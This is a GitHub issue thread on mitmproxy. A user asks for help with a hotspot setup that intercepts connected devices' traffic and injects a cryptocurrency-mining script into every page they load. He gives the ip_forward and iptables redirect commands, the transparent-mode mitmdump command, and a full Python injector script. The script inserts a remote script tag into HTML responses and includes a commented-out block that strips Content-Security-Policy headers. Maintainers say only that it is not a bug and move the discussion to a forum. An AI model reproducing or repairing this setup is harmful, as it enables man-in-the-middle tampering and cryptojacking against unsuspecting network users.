### ISSUE TITLE
Bug in latest master - ModuleNotFoundError: No module named ‘libmproxy’

### ISSUE THREAD

**Issue by caffeinatedMike** [mitmproxy/mitmproxy#2743]
I read in earlier issues (from 2016) that libmproxy was no longer used. I guess it was added back in recently? Anyway, that is the error I get when trying to run my mitmdump command.

Rundown:    
I want to turn my laptop into a hotspot and run mitmproxy on it, so that all devices that connect to it will have my script injected to every webpage they visit (it’s a mining script). So, in exchange for the free WiFi I can earn some revenue. It is fully exposed that this will happen. Is the line I’m using to run mitmproxy/mitmdump in [this snapshot](https://m.imgur.com/gallery/V0pIt) correct for this? Will this work as I intended it? Right now after I run the command and try to connect to the hotspot I can't get internet connection from it. I made sure to turn port forwarding on with
````
sysctl -w net.ipv4.ip_forward=1
````
Then I run
````
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
````
Then I run the mitmproxy command as shown in the screenshot.
````
mitmdump --mode transparent -p 8080 -s "js_injector.js"
````

What am I doing wrong?

**Comment by Kriechi** [comment]
Where did you get your `js_injector.js` script from? I think this is importing libmproxy - which is out of date.

**Comment by caffeinatedMike** [comment]
Wow, I feel like an idiot. I just double-checked the `js_injector.js` and it indeed tries to import libmproxy. How should the script be changed to work with the latest version?
**Current `js_injector.js` Code**
````
# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded

# On start of proxy server ask for src as an argument
def start(context, argv):
    if len(argv) != 2:
        raise ValueError('Usage: -s "js_injector.py src"')
    context.src_url = argv[1]


def response(context, flow):
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        """
        # To Allow CORS
        if "Content-Security-Policy" in flow.response.headers:
            del flow.response.headers["Content-Security-Policy"]
        """
        if html.body and ('text/html' in flow.response.headers["content-type"][0]):
            script = html.new_tag(
                "script",
                src=context.src_url)
            html.body.insert(0, script)
            flow.response.content = str(html)
            context.log("******* Filter Injected *******")
````

**Comment by caffeinatedMike** [comment]
If I change `from libmproxy.protocol.http import decoded` with `from mitmproxy.protocol.http import decoded` I still get `ModuleNotFoundError: No module named 'mitmproxy.protocol'`

**Comment by mhils** [comment]
Let's continue this at https://discourse.mitmproxy.org/t/modulenotfounderror-no-module-named-libmproxy-in-latest-master-release/782. It's definitely not a bug.
